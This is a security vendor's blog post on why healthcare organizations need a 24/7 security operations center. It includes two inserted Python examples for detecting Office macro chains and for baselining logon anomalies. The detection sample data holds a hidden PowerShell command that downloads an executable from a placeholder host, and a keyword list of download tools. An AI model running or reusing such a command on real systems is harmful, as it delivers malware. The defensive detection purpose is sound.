Cysiv Blog

Five Reasons Every Healthcare Organization Needs a 24/7 Security Operations Center

Healthcare organizations have long been a key target for both financially motivated attackers and cyber espionage campaigns. They continue to be a major target, and they continue to pay the price. According to the 2020 Verizon Data Breach Investigations Report, the number of confirmed data breaches against healthcare targets was up 71% over the previous year. And, according to a 2019 Ponemon Institute report, data breaches cost healthcare companies an average of $6.5 million.

Part of the allure is the high-value data that healthcare organizations must hold in order to do their work: personally identifiable information, including medical records, and payment data. Attackers are also drawn to healthcare targets because of the immediacy of the services they provide. Disruptive and destructive threats, like ransomware, threaten to slow down operations. Attackers target healthcare businesses because the need for uptime and quick response when lives are on the line is more critical than in many other industries, which leads victims to accede to ransom demands. Ransomware attacks against healthcare businesses have always been an issue, but they spiked in late 2019 and have remained high through the first half of 2020.

Attackers also home in on healthcare targets because of their sprawling attack surfaces. Between workstations, servers, mobile devices, point-of-sale systems, and internet-enabled medical devices, attackers have a broad range of devices to probe, identify as vulnerable or insecurely configured, and use as a way into the network. The sheer number of devices also makes healthcare an appealing sector for cryptominers and other botnet attacks. Internet-enabled medical devices, in particular, expand that attack surface. And it’s not just cutting-edge attacks: according to a 2020 report from Palo Alto Networks, 83% of medical imaging devices are running unsupported operating systems, leading to a resurgence of older attacks like the decade-old Conficker worm.

The healthcare industry’s unique cybersecurity challenges make 24/7 monitoring and response critical. Attaining that level of oversight is where a round-the-clock, well-staffed security operations center comes into play.

Key Vulnerabilities Targeted in Healthcare Attacks

Threat actors target a wide range of vulnerabilities in order to access systems and data in healthcare environments.

Some threat actors gain access via outdated software, including unpatched JBoss instances, remote desktop clients, and FTP clients. Sometimes, it’s not a question of out-of-date software, but rather insecurely configured systems. Many spyware and ransomware programs get onto systems because Microsoft Office is configured to allow macros; users can download a file, follow a lure that convinces them to enable content in order to display a document properly, and the enabled content is a script that downloads malware. Malware can also spread to machines via malicious JavaScript or Flash files on websites.
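The macro-enabled document chain described above (Office opens a lure, the enabled content launches a script host, the script fetches a payload) has a recognisable shape in endpoint process-creation telemetry: an Office application as the parent of a script interpreter, often with a download command on the command line. The following is an added example, not Cysiv's code or anything from the report it references; it runs a simple parent/child detection over a constructed set of events in a hypothetical, simplified schema (host, pid, ppid, image, cmdline) that real Sysmon or EDR data would be mapped onto first.

```python
"""Flag Office -> script-host process chains in endpoint process-creation events.

Added example, not code from the original page. The event schema and the
sample events below are constructed for illustration.
"""
import ntpath

# Parent images that should rarely, if ever, spawn a script interpreter.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Child images a macro typically uses to stage a download.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments that raise severity because they indicate a fetch from the network.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "http://", "https://", "bitsadmin", "certutil")


def _basename(path: str) -> str:
    # ntpath handles Windows paths regardless of the OS the analysis runs on.
    return ntpath.basename(path).lower()


def find_macro_chains(events):
    """Return one hit per script-host process whose parent is an Office application.

    events: list of dicts with keys host, pid, ppid, image, cmdline (hypothetical schema).
    Parent lookup is keyed on (host, pid) so chains are matched per machine.
    """
    by_key = {(e["host"], e["pid"]): e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        parent = by_key.get((e["host"], e["ppid"]))
        if parent is None or _basename(parent["image"]) not in OFFICE_IMAGES:
            continue
        cmd = e["cmdline"].lower()
        severity = "high" if any(m in cmd for m in DOWNLOAD_MARKERS) else "medium"
        hits.append({
            "host": e["host"],
            "parent": _basename(parent["image"]),
            "child": _basename(e["image"]),
            "severity": severity,
            "cmdline": e["cmdline"],
        })
    return hits


# Constructed sample telemetry: one benign Office session, one macro chain with a
# download, one macro chain without, and a PowerShell process launched from Explorer.
SAMPLE_EVENTS = [
    {"host": "ws-billing-07", "pid": 4100, "ppid": 900,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "ws-billing-07", "pid": 4212, "ppid": 4100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"host": "ws-billing-07", "pid": 4330, "ppid": 4212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a.exe')"},
    {"host": "ws-billing-07", "pid": 4401, "ppid": 4212,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "ws-billing-07", "pid": 4510, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in find_macro_chains(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['host']}: {hit['parent']} -> {hit['child']}: {hit['cmdline']}")
```

The PowerShell process spawned by Explorer is deliberately not flagged: the point of the rule is the parent relationship, not the interpreter itself, which keeps false positives from administrative scripting low. The "medium" hit (Office spawning `cmd.exe` with no download marker) is still worth a look, since the network fetch can happen in a later process.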

Attackers also target insecure medical devices. Though more and more medical devices are being designed with network capabilities, many are not designed with security in mind. Though the devices themselves may not store the data the attackers seek, they can be easy entry points for the network, and attackers can pivot from a vulnerable device to other, higher-value targets on the network.

Attackers also go beyond technical flaws and attack the human element. Threat actors commonly use phishing and spearphishing attacks against healthcare companies in order to gain network access. This has been a specific problem during the pandemic. Threat actors are running phishing campaigns with lures such as new information about COVID-19, offers of personal protective equipment, and fake shipping information for ventilators. There are also known attacks against mobile devices that use pandemic-related lures. For example, attackers built a fake version of a COVID-19 tracking map that had an information stealer and a downloader built into it. Those phishing campaigns can lead to either credential theft or the installation of ransomware or spyware on company machines.

In the current climate, attackers are also taking advantage of broader work-from-home policies in the medical sector. According to a joint advisory, the United States Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency and the United Kingdom National Cyber Security Centre have identified APT groups who have specifically targeted vulnerabilities in remote work software: specifically Citrix, as well as VPN products from Pulse Secure, Fortinet, and Palo Alto.

Cybersecurity Challenges in Healthcare

As a healthcare provider, you know the importance of keeping systems online and patient data secure. This requires not only knowing what the threat landscape looks like, but actively defending your systems and data against both internal and external threats.

Doing so is a challenge. It requires tracking a wide range of assets, from workstations to servers to mobile devices to point-of-sale systems to medical devices, often spread across multiple sites. It involves patching these devices in a timely manner, ensuring their configurations follow security best practices, and appropriately controlling access to them. Finally, it requires being able to see how every device on the network is behaving at every moment in order to identify anomalous or suspicious activity and prevent a breach.

The Case for a 24/7 SOC in Healthcare

Given the broad range of vectors for attacks against the healthcare sector, and how attractive the healthcare sector continues to be for both financially motivated attackers and cyber espionage groups, it is imperative that healthcare businesses put in the work to strengthen their security posture. A 24/7 SOC is now the baseline for any mature security program:

  • Knowing What’s Normal Helps You Know What’s Abnormal: In order to detect suspicious activity, your business needs a baseline. A 24/7 SOC with experienced cybersecurity staff can make sense of network traffic, events, and alerts. Once the SOC knows what is normal in the network, it can more quickly identify anomalies and foil attackers.
  • Identify Rogue Activity Quickly: If an attacker gets on the network or a machine becomes infected with malware, a 24/7 SOC will allow that rogue activity to be identified as quickly as possible. Speedy incident response can minimize the effects and costs of a breach.
  • Uptime Matters: When someone’s health is on the line, every second matters. Attackers know this, and target the healthcare industry with disruptive and destructive threats. With a 24/7 SOC, a healthcare business can identify threats more quickly, which leads to systems staying online and data remaining accessible by those who need it to provide care, without having to restore from backups or pay a ransom.
  • Coordinated Response: Part of the difficulty of securing a healthcare business involves being able to see and respond to issues at multiple medical offices. That has become even more difficult during the COVID-19 pandemic as more medical staff have had to work from home. However, a SOC that is taking in and analyzing data from all machines with access to corporate data will put the company in the best position to understand.
  • Expert Analysis: A 24/7 SOC staffed with experienced security, threat, data science, and incident response professionals allows a healthcare business to analyze the network on an ongoing basis, identify anomalies, and hunt for and respond to threats. Few healthcare organizations have the time or resources to recruit and train an expert 24/7 SOC staff; as an alternative, it makes sense to consider an industry-leading SOC-as-a-Service solution, like Cysiv, in order to experience the ongoing benefits of a 24/7 SOC without the expense and challenges of building it from scratch.
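
The first bullet above, knowing what is normal so that the abnormal stands out, is at its simplest a per-host baseline with a deviation threshold. The following is an added example, not Cysiv's code or a description of its platform: it builds a baseline of hourly failed-logon counts per host from a constructed training window, then scores new observations by z-score. The host names, counts, and threshold are all constructed; the two edge cases a SOC runs into immediately (a host whose history is all zeros, and a host with no history at all) are handled explicitly.

```python
"""Per-host baseline and deviation scoring for hourly event counts.

Added example, not code from the original page. Hosts, counts and the
threshold below are constructed for illustration.
"""
import statistics


def build_baseline(history):
    """history: {host: [count per hour over the training window]}.

    Returns {host: (mean, population stdev)}. A single-sample history gets
    stdev 0.0 rather than raising.
    """
    baseline = {}
    for host, counts in history.items():
        mean = statistics.fmean(counts)
        stdev = statistics.pstdev(counts) if len(counts) > 1 else 0.0
        baseline[host] = (mean, stdev)
    return baseline


def score(baseline, observations, threshold=3.0, min_stdev=1.0):
    """observations: list of (host, hour_label, count).

    Flags a count whose z-score exceeds `threshold` (one-sided: only spikes,
    since a drop in failed logons is not what this rule is for). `min_stdev`
    floors the divisor so a host whose history is all zeros does not produce
    an infinite score; it also means a single stray event on a quiet host is
    not an alert on its own. Hosts with no baseline are surfaced separately
    rather than silently skipped.
    """
    anomalies = []
    for host, hour, count in observations:
        if host not in baseline:
            anomalies.append({"host": host, "hour": hour, "count": count,
                              "reason": "no baseline (new host)"})
            continue
        mean, stdev = baseline[host]
        z = (count - mean) / max(stdev, min_stdev)
        if z > threshold:
            anomalies.append({"host": host, "hour": hour, "count": count,
                              "reason": f"z={z:.1f} (mean {mean:.2f}, stdev {stdev:.2f})"})
    return anomalies


# Constructed training data: 48 hourly failed-logon counts per host.
# A workstation with a little routine noise, and a server that never sees any.
HISTORY = {
    "ws-radiology-01": [1, 2, 0, 3, 1, 2, 1, 0, 2, 1, 3, 2,
                        1, 0, 1, 2, 2, 1, 0, 3, 1, 2, 1, 2] * 2,
    "srv-pacs-01": [0] * 48,
}

# Constructed observations for the next few hours.
OBSERVATIONS = [
    ("ws-radiology-01", "2020-06-01T02:00", 40),   # spike: should be flagged
    ("ws-radiology-01", "2020-06-01T03:00", 4),    # within normal noise
    ("srv-pacs-01", "2020-06-01T02:00", 5),        # anything on a silent host is notable
    ("ws-new-14", "2020-06-01T02:00", 1),          # never seen before
]


def run_demo():
    return score(build_baseline(HISTORY), OBSERVATIONS)


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a['host']} {a['hour']}: count={a['count']} {a['reason']}")
```

In practice the baseline would be recomputed on a rolling window and keyed on more than host alone (host and hour-of-day, or host and user), but the shape is the same: learn the distribution, floor the variance, and treat "no history" as its own finding rather than as zero.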

SOC-as-a-Service: Better Medicine

A 24/7 SOC is an essential line of defense, but building and scaling one from scratch requires time, capital, and expertise that put it beyond the reach of all but the largest healthcare businesses. However, an industry-leading 24/7 SOC is still within reach of healthcare organizations of all sizes. Cysiv SOC-as-a-Service not only offers all the ongoing security benefits of a best-in-class SOC, but it also makes implementing and scaling it easier and more cost-effective than ever. Cysiv's cloud-native, co-managed, next-gen SIEM; our security, threat, IR, and data science professionals who complement and collaborate with your team; and pay-as-you-go, consumption-based monthly billing are just what the doctor ordered.

To learn more about active cybersecurity threats against the healthcare industry, and how your business can strengthen its defenses with SOC-as-a-Service, download our Healthcare Threat Report.